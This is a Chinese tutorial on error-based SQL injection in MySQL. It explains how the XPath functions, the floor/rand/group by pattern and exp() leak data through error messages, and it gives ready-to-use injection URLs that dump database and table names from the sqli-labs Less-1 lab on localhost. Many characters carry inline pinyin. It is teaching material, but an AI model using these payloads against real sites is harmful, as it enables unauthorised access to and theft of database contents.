SQL報(bào)錯(cuò)注入概述

通過(guò)構(gòu)造特定的SQL語(yǔ)句，讓攻擊者想要查詢的信息（如數(shù)據(jù)庫(kù)名、版本號(hào)、用戶名等）通過(guò)頁(yè)面面的錯(cuò)誤提示回顯出來(lái)。

報(bào)錯(cuò)注入的前提條件

• Web應(yīng)用程序未關(guān)閉數(shù)據(jù)庫(kù)報(bào)錯(cuò)函數(shù)，對(duì)于一些SQL語(yǔ)句的錯(cuò)誤直接回顯在頁(yè)面上
• 后臺(tái)未對(duì)一些具有報(bào)錯(cuò)功能的函數(shù)（如extractvalue、updatexml等）進(jìn)行過(guò)濾

Xpath類型函數(shù)

extractvalue()

作用：對(duì)XML文檔進(jìn)行查詢，相當(dāng)于在HTML文件中用標(biāo)簽查找元素。

語(yǔ)法: extractvalue( XML_document, XPath_string )

• 參數(shù)1：XML_document是String格式，為XML文檔對(duì)象的名稱
• 參數(shù)2：XPath_string(Xpath格式的字符串)，注入時(shí)可操作的地方

報(bào)錯(cuò)原理：xml文檔中查找字符位置是用/xxx/xxx/xxx/...這種格式，如果寫入其他格式就會(huì)報(bào)錯(cuò)，并且會(huì)返回寫入的非法格式內(nèi)容，錯(cuò)誤信息如：XPATH syntax error:'xxxxxxxx‘

updatexml()

作用：改變文檔中符合條件的節(jié)點(diǎn)的值。

語(yǔ)法: updatexml( XML_document, XPath_string, new_value )

• 參數(shù)1：XML_document是String格式，為XML文檔對(duì)象的名稱
• 參數(shù)2：XPath_string(Xpath格式的字符串)，注入時(shí)可操作的地方
• 參數(shù)3：new_value，String格式，替換查找到的符合條件的數(shù)據(jù)

報(bào)錯(cuò)原理:同extractvalue()

其他函數(shù)

floor()、rand()、count()、group by聯(lián)用

作用

floor(x)：對(duì)參數(shù)x向下取整

rand()：生成一個(gè)0～1之間的隨機(jī)浮點(diǎn)數(shù)

count(*)：統(tǒng)計(jì)某個(gè)表下總共有多少條記錄

group by x: 按照 (by) 一定的規(guī)則（x）進(jìn)行分組

報(bào)錯(cuò)原理：group by與rand()使用時(shí)，如果臨時(shí)表中沒(méi)有該主鍵，則在插入前會(huì)再計(jì)算一次rand()，然后再由group by將計(jì)算出來(lái)的主鍵直接插入到臨時(shí)表格中，導(dǎo)致主鍵重復(fù)報(bào)錯(cuò)

exp()（5.5.5<= MySQL數(shù)據(jù)庫(kù)版本號(hào)<=5.5.49）

作用：計(jì)算以e（自然常數(shù)）為底的冪值

語(yǔ)法: exp(x)

報(bào)錯(cuò)原理：當(dāng)參數(shù)x超過(guò)710時(shí)，exp()函數(shù)會(huì)報(bào)錯(cuò)，錯(cuò)誤信息如：DOUBLE value is of range:

MySQL數(shù)據(jù)庫(kù)報(bào)錯(cuò)功能函數(shù)總匯

報(bào)錯(cuò)注入實(shí)例

extractvalue()

依然用sqli/Less-1

直接用報(bào)錯(cuò)函數(shù)進(jìn)行暴庫(kù)操作

暴庫(kù)

http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',database())) --+

暴表

http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+

后面的步驟大致相同，不再演示

updatexml()

暴庫(kù)

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',database()),1) --+

暴表

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

總結(jié) 

到此這篇關(guān)于SQL注入教程之報(bào)錯(cuò)注入的文章就介紹到這了,更多相關(guān)SQL報(bào)錯(cuò)注入內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！